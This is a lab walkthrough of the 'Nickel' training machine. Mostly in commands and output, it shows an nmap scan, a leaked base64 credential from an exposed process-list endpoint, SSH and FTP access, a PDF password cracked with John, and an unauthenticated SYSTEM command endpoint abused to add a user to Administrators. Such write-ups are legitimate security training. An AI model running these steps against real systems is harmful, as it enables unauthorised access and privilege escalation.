In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types…
nmap scan
|_ SYST: UNIX emulated by FileZilla
22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 86:84:fd:d5:43:27:05:cf:a7:f2:e9:e2:75:70:d5:f3 (RSA)
| 256 9c:93:cf:48:a9:4e:70:f4:60:de:e1:a9:c2:c0:b6:ff (ECDSA)
|_ 256 00:4e:d7:3b:0f:9f:e3:74:4d:04:99:0b:b1:8b:de:a5 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-10-07T13:16:27+00:00; +5s from scanner time.
| rdp-ntlm-info:
| Target_Name: NICKEL
| NetBIOS_Domain_Name: NICKEL
| NetBIOS_Computer_Name: NICKEL
| DNS_Domain_Name: nickel
| DNS_Computer_Name: nickel
| Product_Version: 10.0.18362
|_ System_Time: 2023-10-07T13:15:17+00:00
| ssl-cert: Subject: commonName=nickel
| Not valid before: 2023-10-06T13:12:47
|_Not valid after: 2024-04-06T13:12:47
8089/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 4s, deviation: 0s, median: 3s
|_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
|_smb2-time: ERROR: Script execution failed (use -d to debug)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.10 seconds
Low hanging fruit — http
non of the links work – 169.254.109.39 is the IP they are trying to get
Enumerating with ffuf
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.156.99:8089//FUZZ
Nothing comes out of FFUF
Checking the links, they redirect to
http://169.254.109.39:33333/list-running-procs
http://169.254.109.39:33333/list-active-nodes
http://169.254.109.39:33333/list-current-deployments
we try curl on the the three but with 192.168.156.99 then also rin POST
╰─$ curl -X GET http://192.168.156.99:33333/list-current-deployments 130 ↵
^C^X^C
╭─kali@kali ~/PG/nickel
╰─$ curl -X GET http://192.168.180.99:33333/list-current-deployments 130 ↵
<p>Cannot "GET" /list-current-deployments</p>% ╭─kali@kali ~/PG/nickel
╰─$ ps -ax | grep openvpn
╭─kali@kali ~/PG/nickel
╰─$ curl -X GET http://192.168.180.99:33333/list-active-nodes 130 ↵
<p>Cannot "GET" /list-active-nodes</p>% ╭─kali@kali ~/PG/nickel
╰─$ curl -X GET http://192.168.180.99:33333/list-running-procs
<p>Cannot "GET" /list-running-procs</p>% ╭─kali@kali ~/PG/nickel
╰─$ curl -X POST http://192.168.180.99:33333/list-current-deployments -H 'Content-Length: 0'
<p>Not Implemented</p>% ╭─kali@kali ~/PG/nickel
╰─$ curl -X POST http://192.168.180.99:33333/list-active-nodes -H 'Content-Length: 0'
<p>Not Implemented</p>% ╭─kali@kali ~/PG/nickel
╰─$ curl -X POST http://192.168.180.99:33333/list-running-procs -H 'Content-Length: 0'
name : System Idle Process
commandline :
name : System
commandline :
name : Registry
commandline :
name : smss.exe
commandline :
name : csrss.exe
commandline :
name : wininit.exe
commandline :
name : csrss.exe
commandline :
name : winlogon.exe
commandline : winlogon.exe
name : services.exe
commandline :
name : lsass.exe
commandline : C:\Windows\system32\lsass.exe
name : fontdrvhost.exe
commandline : "fontdrvhost.exe"
name : fontdrvhost.exe
commandline : "fontdrvhost.exe"
name : dwm.exe
commandline : "dwm.exe"
name : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws80.ps1
name : Memory Compression
commandline :
name : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p
"Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
name : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws8089.ps1
name : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws33333.ps1
name : spoolsv.exe
commandline : C:\Windows\System32\spoolsv.exe
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : FileZilla Server.exe
commandline : "C:\Program Files (x86)\FileZilla Server\FileZilla Server.exe"
name : sshd.exe
commandline : "C:\Program Files\OpenSSH\OpenSSH-Win64\sshd.exe"
name : VGAuthService.exe
commandline : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
name : vmtoolsd.exe
commandline : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
name : dllhost.exe
commandline : C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
name : WmiPrvSE.exe
commandline : C:\Windows\system32\wbem\wmiprvse.exe
name : LogonUI.exe
commandline : "LogonUI.exe" /flags:0x2 /state0:0xa392c855 /state1:0x41c64e6d
name : msdtc.exe
commandline : C:\Windows\System32\msdtc.exe
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : SgrmBroker.exe
commandline :
name : SearchIndexer.exe
commandline : C:\Windows\system32\SearchIndexer.exe /Embedding
name : WmiApSrv.exe
commandline : C:\Windows\system32\wbem\WmiApSrv.exe
name : WmiPrvSE.exe
commandline : C:\Windows\system32\wbem\wmiprvse.exe
name : WmiPrvSE.exe
commandline : C:\Windows\system32\wbem\wmiprvse.exe
name : UpdateNotificationMgr.exe
commandline : C:\Windows\System32\UNP\UpdateNotificationMgr.exe
we find
cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p
"Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
Looks like a base64
decoding with base64
╭─kali@kali ~/PG/nickel
╰─$ echo Tm93aXNlU2xvb3BUaGVvcnkxMzkK | base64 -d
NowiseSloopTheory139
╭─kali@kali ~/PG/nickel
╰─$
tring logging with ssh and are in
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.
ariah@NICKEL C:\Users\ariah>whoami
nickel\ariah
ariah@NICKEL C:\Users\ariah>cd ../
ariah@NICKEL C:\Users>cd ../
ariah@NICKEL C:\>
looking around we find an FTP folder with a PDF inside
ariah@NICKEL C:\>dir
Volume in drive C has no label.
Volume Serial Number is 9451-68F7
Directory of C:\
09/01/2020 12:38 PM <DIR> ftp
09/01/2020 12:04 PM <DIR> PerfLogs
10/19/2020 08:39 AM <DIR> Program Files
09/01/2020 12:38 PM <DIR> Program Files (x86)
09/01/2020 12:38 PM <DIR> Users
09/01/2020 12:36 PM <DIR> Windows
0 File(s) 0 bytes
6 Dir(s) 7,863,914,496 bytes free
ariah@NICKEL C:\>cd ftp
ariah@NICKEL C:\ftp>dir
Volume in drive C has no label.
Volume Serial Number is 9451-68F7
Directory of C:\ftp
09/01/2020 12:38 PM <DIR> .
09/01/2020 12:38 PM <DIR> ..
09/01/2020 11:02 AM 46,235 Infrastructure.pdf
1 File(s) 46,235 bytes
2 Dir(s) 7,863,914,496 bytes free
ariah@NICKEL C:\ftp>
we try and get access to this via ftp and via the ariah cred
╭─kali@kali ~/PG/nickel
╰─$ wget --no-passive-ftp ftp://ariah:[email protected]/Infrastructure.pdf
--2023-10-07 23:58:58-- ftp://ariah:*password*@192.168.180.99/Infrastructure.pdf
=> ‘Infrastructure.pdf’
Connecting to 192.168.180.99:21... connected.
Logging in as ariah ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD not needed.
==> SIZE Infrastructure.pdf ... 46235
==> PORT ... done. ==> RETR Infrastructure.pdf ... done.
Length: 46235 (45K) (unauthoritative)
Infrastructure.pdf 100%[=================================================>] 45.15K 78.8KB/s in 0.6s
2023-10-07 23:59:01 (78.8 KB/s) - ‘Infrastructure.pdf’ saved [46235]
╭─kali@kali ~/PG/nickel
╰─$
Opening the pdf with evincece and we find that its password protected
using John to try and crack the password
/usr/share/john/pdf2john.pl
╭─kali@kali ~/PG/nickel
╰─$ /usr/share/john/pdf2john.pl Infrastructure.pdf > pdf.hash
╭─kali@kali ~/PG/nickel
cracking the password with rockyou wordlist
╭─kali@kali ~/PG/nickel
╰─$ john pdf.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64])
Cost 1 (revision) is 4 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:01:32 54.37% (ETA: 00:13:11) 0g/s 85476p/s 85476c/s 85476C/s git149b..gissy7
ariah4168 (Infrastructure.pdf)
1g 0:00:01:57 DONE (2023-10-08 00:12) 0.008539g/s 85433p/s 85433c/s 85433C/s arial<3..ariadne01
Use the "--show --format=PDF" options to display all of the cracked passwords reliably
Session completed.
╭─kali@kali ~/PG/nickel
╰─$
Password – ariah4168
contents of the pdf
Infrastructure Notes
Temporary Command endpoint: http://nickel/?
Backup system: http://nickel-backup/backup
NAS: http://corp-nas/files
on reserch, we can run a command on that end point
going back to the ssh shell we had i load powershell
ariah@NICKEL C:\Windows\System32\WindowsPowerShell>dir
Volume in drive C has no label.
Volume Serial Number is 9451-68F7
Directory of C:\Windows\System32\WindowsPowerShell
03/18/2019 09:52 PM <DIR> .
03/18/2019 09:52 PM <DIR> ..
03/18/2019 11:20 PM <DIR> v1.0
0 File(s) 0 bytes
3 Dir(s) 7,878,819,840 bytes free
ariah@NICKEL C:\Windows\System32\WindowsPowerShell>cd v1.0
Volume Serial Number is 9451-68F7
Directory of C:\Windows\System32\WindowsPowerShell\v1.0
03/18/2019 11:20 PM <DIR> .
03/18/2019 11:20 PM <DIR> ..
03/18/2019 09:46 PM 12,825 Certificate.format.ps1xml
03/18/2019 09:46 PM 5,074 Diagnostics.Format.ps1xml
03/18/2019 09:46 PM 138,223 DotNetTypes.format.ps1xml
03/18/2019 11:20 PM <DIR> en
03/18/2019 11:20 PM <DIR> en-US
03/18/2019 09:46 PM 10,144 Event.Format.ps1xml
03/18/2019 09:53 PM <DIR> Examples
03/18/2019 09:46 PM 25,526 FileSystem.format.ps1xml
03/18/2019 09:46 PM 9,164 getevent.types.ps1xml03/18/2019 09:46 PM 91,655 Help.format.ps1xml
03/18/2019 09:46 PM 138,625 HelpV3.format.ps1xml
09/01/2020 11:49 AM <DIR> Modules
03/18/2019 09:46 PM 451,584 powershell.exe
03/18/2019 09:46 PM 395 powershell.exe.config03/18/2019 09:46 PM 206,468 PowerShellCore.format.
ps1xml
03/18/2019 09:46 PM 4,097 PowerShellTrace.format.ps1xml
03/18/2019 09:46 PM 212,480 powershell_ise.exe
03/18/2019 09:46 PM 465 powershell_ise.exe.config
03/18/2019 09:46 PM 55,808 PSEvents.dll
03/18/2019 09:45 PM 174,592 pspluginwkr.dll
03/18/2019 09:46 PM 2,560 pwrshmsg.dll
03/18/2019 09:46 PM 29,696 pwrshsip.dll
03/18/2019 09:46 PM 8,458 Registry.format.ps1xml
03/18/2019 09:52 PM <DIR> Schemas
03/18/2019 09:52 PM <DIR> SessionConfig
03/18/2019 09:46 PM 210,376 types.ps1xml
03/18/2019 09:46 PM 12,282 typesv3.ps1xml
03/18/2019 09:46 PM 16,598 WSMan.Format.ps1xml
22 File(s) 1,817,095 bytes
8 Dir(s) 7,878,819,840 bytes free
ariah@NICKEL C:\Windows\System32\WindowsPowerShell\v1.0>powershell.exe
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
on research from chatgpt
$response = Invoke-WebRequest 'http://nickel/?whoami' -UseBasicParsing
$charContent = [System.Text.Encoding]::UTF8.GetString($response.Content)
$charContent
PS C:\Windows\System32\WindowsPowerShell\v1.0> $response = Invoke-WebRequest 'http://nickel/?whoami' -UseBasicParsing
PS C:\Windows\System32\WindowsPowerShell\v1.0> $charContent = [System.Text.Encoding]::UTF8.GetString($response.Content)
PS C:\Windows\System32\WindowsPowerShell\v1.0> $charContent
<!doctype html><html><body>dev-api started at 2020-10-20T10:38:24
<pre>nt authority\system
</pre>
</body></html>
PS C:\Windows\System32\WindowsPowerShell\v1.0>
adding ariah to admin group with powershell
$response = Invoke-WebRequest -Uri "http://nickel/?command=net%20localgroup%20Administrators%20ariah%20/add" -UseBasicParsing
$response.Content
$response = Invoke-WebRequest -Uri "http://nickel/?net localgroup Administrators ariah /add" -UseBasicParsing
$response.RawContent
PS C:\Windows\System32\WindowsPowerShell\v1.0> $response = Invoke-WebRequest -Uri "http://nickel/?command=net%20localgrou
p%20Administrators%20ariah%20/add" -UseBasicParsing^C
PS C:\Windows\System32\WindowsPowerShell\v1.0> $response = Invoke-WebRequest -Uri "http://nickel/?net localgroup Administ
rators ariah /add" -UseBasicParsing
PS C:\Windows\System32\WindowsPowerShell\v1.0> $response.RawContent
HTTP/1.1 200 OK
Content-Length: 136
Date: Sun, 08 Oct 2023 04:37:40 GMT
Last-Modified: Sat, 07 Oct 2023 21:37:40 GMT
Server: Powershell Webserver/1.2 on Microsoft-HTTPAPI/2.0
<!doctype html><html><body>dev-api started at 2020-10-20T10:38:24
<pre>The command completed successfully.
</pre>
</body></html>
PS C:\Windows\System32\WindowsPowerShell\v1.0>
log out of ssh and connect again
ariah@NICKEL C:\Users\ariah>whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================================= ================ ============ =============================
==================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by d
efault, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Mandatory group, Enabled by d
efault, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by d
efault, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by d
efault, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by d
efault, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by d
efault, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by d
efault, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by d
efault, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by d
efault, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
ariah@NICKEL C:\Users\ariah>
Directory of C:\Users\Administrator\Desktop
09/01/2020 12:41 PM <DIR> .
09/01/2020 12:41 PM <DIR> ..
09/01/2020 12:36 PM 1,450 Microsoft Edge.lnk
10/07/2023 07:52 PM 34 proof.txt
2 File(s) 1,484 bytes
2 Dir(s) 7,877,165,056 bytes free
ariah@NICKEL C:\Users\Administrator\Desktop>